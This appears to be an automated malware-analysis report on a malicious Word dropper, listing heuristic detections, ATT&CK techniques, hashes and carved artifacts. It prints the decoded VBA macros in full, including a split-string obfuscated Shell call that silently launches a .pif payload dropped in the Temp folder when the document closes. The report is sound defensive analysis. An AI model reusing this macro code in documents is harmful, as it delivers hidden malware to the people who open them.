MALICIOUS
538
Risk Score
Malware Insights
MITRE ATT&CK
T1203 Exploitation for Client Execution
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample exploits CVE-2007-3899, a memory corruption vulnerability in Microsoft Word, to achieve code execution. The Document_Open macro attempts to copy content and then executes a command using the reassembled string 'cmd.exe'. The Document_Close macro also attempts to execute 'cmd.exe' to start a PIF file dropped in the temporary directory. The presence of VirtualProtect, LoadLibrary, and GetProcAddress API calls suggests the loaded payload is likely a downloader or backdoor.
Heuristics 14
-
CVE-2007-3899 — Microsoft Word malformed string memory corruption critical CVE likely CVE_2007_3899Word OLE document has the MS07-060 malformed-string exploit shape: a Word 97-family FIB points to a malformed DOP/string-table region with an abnormal INT_MAX run, inflated text counters, and exploit payload or Mdropper.Z campaign evidence.
-
Office EPRINT stream contains EMF object high OLE_EPRINT_EMF_OBJECTOLE ObjectPool contains an EPRINT stream with EMF data. This is rare in normal documents and is related Office object-delivery evidence when paired with exploit payload anomalies, but the malformed graphics record required for exact CVE attribution is not proven by this rule alone.
-
ClamAV: Doc.Dropper.Agent-6595074-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6595074-0
-
XOR-encoded strings (key 0xAB) critical SC_XOR_ENCODEDFound 3 Windows library/API name(s) XOR-encoded with single-byte key 0xAB: 'LoadLibraryA', 'GetProcAddress', 'VirtualAlloc'Disassembly hidden — these bytes score as data, not coherent x86 code (1/4 branch targets land on an instruction boundary (25% coherence)).
-
Ole10Native package drops an auto-executable payload critical OFFICE_PACKAGE_RISKY_FILEOLE Package displayName or fullPath ends in a directly auto-executable extension (a runnable binary or a script the default shell host runs on double-click). Embedding such a payload inside an Office document has no benign authoring use — it is a malware-delivery dropper.
-
VBA macros detected medium 4 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Shell "cm" & "d.e" & "xe /c pi" & "ng loc" & "alhost -n 100 && start " & Environ("Temp") & "\6C.pif", vbHide -
Dangerous API name reassembled from split string literals critical OLE_VBA_SPLIT_KEYWORD_OBFUSCATIONVBA concatenates short string literals that reassemble a dangerous API/ProgID/LOLBin name (e.g. Scripting.FileSystemObject, WScript.Shell, powershell, URLDownloadToFile) which appears in no single literal. Splitting an API name across string concatenation is done only to evade keyword scanning.Matched line in script
Shell "cm" & "d.e" & "xe /c pi" & "ng loc" & "alhost -n 100 && start " & Environ("Temp") & "\6C.pif", vbHide -
Document_Open macro low OLE_VBA_DOCOPENDocument_Open macroMatched line in script
Private Sub Document_Open() -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
FileCopy Environ("Temp") & "\5C.pif", Environ("Temp") & "\6C.pif" -
Reference to LoadLibrary API high SC_STR_LOADLIBRARYReference to LoadLibrary API
-
Reference to GetProcAddress API high SC_STR_GETPROCADDRESSReference to GetProcAddress API
-
Reference to VirtualProtect API medium SC_STR_VIRTUALPROTECTReference to VirtualProtect API
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL https://secure.comodo.net/CPS0C In document text (OLE body)
- http://ocsp.comodoca.com0In document text (OLE body)
- http://ns.adobe.com/xap/1.0/In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://crl.comodoca.com/COMODORSACodeSigningCA.crl0tIn document text (OLE body)
- http://crt.comodoca.com/COMODORSACodeSigningCA.crt0$In document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/bibliographyIn document text (OLE body)
- http://schemas.openxmlformats.org/officeDocument/2006/customXmlIn document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)
Extracted artifacts 3
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas🔏 SignedVBA project digital signature |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 1347 bytes |
SHA-256: ea2604151079cdab9ae323cf62220f2c04e6560f5f3d26f5955b3e591348b44a |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_Open()
On Error Resume Next
Application.DisplayAlerts = False
Dim Str As String
Selection.MoveDown Unit:=wdScreen, Count:=7
Selection.MoveDown Unit:=wdScreen, Count:=7
Selection.MoveRight Unit:=wdCharacter, Count:=13
Selection.TypeBackspace
Selection.Copy
FileCopy Environ("Temp") & "\5C.pif", Environ("Temp") & "\6C.pif"
Selection.TypeBackspace
Set d = New DataObject
d.SetText " "
d.PutInClipboard
Selection.MoveUp Unit:=wdScreen, Count:=7
Selection.MoveUp Unit:=wdScreen, Count:=7
Selection.MoveLeft Unit:=wdCharacter, Count:=13
Dim t As Date
t = Now
Do
DoEvents
Loop Until Now >= DateAdd("s", 3, t)
Call Module1.killo
End Sub
Private Sub Document_Close()
Shell "cm" & "d.e" & "xe /c pi" & "ng loc" & "alhost -n 100 && start " & Environ("Temp") & "\6C.pif", vbHide
End Sub
Attribute VB_Name = "Module1"
Sub killo()
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatXMLDocument
End Sub
|
|||
ole10native_00.bin |
ole-package | OLE Ole10Native stream: ObjectPool/_1591716974/Ole10Native | 70884 bytes |
SHA-256: 2eee3bd02db4b19b89b3849feb31331af2d67eeec8577c44f0c5a6c729d33bf7 |
|||
ole10native_00_5C.pif |
ole-package-payload | OLE Ole10Native payload: ObjectPool/_1591716974/Ole10Native; display_name=5C.pif; full_path=C:\Users\win7home\AppData\Local\Temp\5C.pif; temp_path=; def_file= | 70608 bytes |
SHA-256: cd78243e2a4e94cd61aa95edfb4708ceeed5a3ed50ee9b81c57d0935908eb23e |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.